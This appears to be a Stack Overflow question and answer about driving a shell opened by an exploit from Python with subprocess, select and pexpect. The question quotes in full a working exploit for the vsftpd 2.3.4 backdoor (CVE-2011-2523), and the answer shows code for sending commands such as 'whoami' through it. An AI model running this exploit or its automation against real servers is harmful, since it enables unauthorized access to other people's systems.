# How to interact with a reverse shell given by a script in python?

Tags: python, shell, subprocess, python-3.8, pexpect

I would like to "automate" a reverse shell given by a script. Let me explain:

**Contexte**: There is a backdoor on a vulnerable machine.

**What am I doing**: I create a `subprocess` which executes a script (python, perl, ...) and which gives me a reverse shell.

```
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()
```

**What I would like to do**: Along with running my script <=> running my reverse shell, I would like to be able to interact with it, using methods.

Today, I am able to write manually in the terminal of my reverse shell: the script that I call with `Popen` runs and uses the backdoor. This gives me a reverse shell and I can type my commands.

Tomorrow, I would like to be able to call methods during the execution of this reverse shell: I run a script with `Popen`, it exploits the backdoor and gives me a shell. And rather than typing commands manually, I would like that automatically, a whole series of commands be sent to this reverse shell, and that for each one of them, I be able to recover the returned data.

**Ideally**, I would like something like that:

```
backdoor.execute() //This method allow me to get a reverse shell

backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
.
.
backdoor.finish() //This method allow to close the reverse shell
```

**What I tried to do without success**: I tried with the `Popen` class of the `subprocess` module, to redirect the input and / or the output of the script

```
Popen(["python", /opt/exploits/backdoor.py, remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
```

However, when trying to redirect these two streams (or just one of them), my reverse shell closes as quickly as it opened.

I also tried to put my commands directly on the `communicate()` method:

```
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
```

I tried this with and without redirection of input and / or output, but nothing worked.

Finally, I tried to use the `pexpect` module to run my script to get a reverse shell, but I didn't have anything conclusive (maybe I did it wrong).

**PS**: I cannot change the code of the script that allows me to use the backdoor.

**backdoor.py**

```
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3   
                                                           
from telnetlib import Telnet 
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)                           
parser=argparse.ArgumentParser()        
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()       
host = args.host                        
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
```

Comment: Who can tell what's going on if you don't show the code of `backdoor.py`?

Comment: @Armali I've edited my post, you can now watch the backdoor. It is a simple telnet connection. And I would like to replace the commands that I type manually in my terminal, by methods that interact directly with this reverse shell.

Comment: Didn't you inspect the return value of the second shown `Popen(…).communicate(…)`?

Comment: Yess, it return None cause I think that the "whoami" command is sent immediately and the reverse shell needs a little time to set up.

Comment: Hm - the _time to set up_ should not matter, since the [documentation](https://docs.python.org/3/library/subprocess.html#subprocess.Popen.communicate) says: _Wait for process to terminate_. It must rather be the same problem of which you say _when I redirect the input to the output my shell immediately quits._

Answer (score 0):

> ```
> Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
> ```

This should work for the single command after a `\n` is appended and if the `-u` (unbuffered) option is used. Of course something has to be done with the return value in order to get the command output:

```
output = Popen(["python", "-u", "/opt/exploits/backdoor.py", remote_ip],
               stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami\n")
```

> ```
> backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
> ```

Provided that

```
backdoor = Popen(["python", "-u", "backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE)
```

we can *send a command* (if you don't want to exit thereafter) with e. g.

```
backdoor.stdin.write(b"whoami\n")
```

and *get the result* of indetermined length with

```
import select
import os
timeout = 1
while select.select([backdoor.stdout], [], [], timeout)[0]:
    print(os.read(backdoor.stdout.fileno(), 4096).decode())
```

Comment: Thank you very much for your reply, but it is not working. I don't know why when I redirect the input to the output my shell immediately quits. With all of my testing, the only way I have found to keep the shell open is to not redirect input or output. So your answer doesn't send me anything, and the shell closes.

Comment: What do you mean by _redirect the input to the output_?

Comment: I mean stdin=PIPE - stdout=PIPE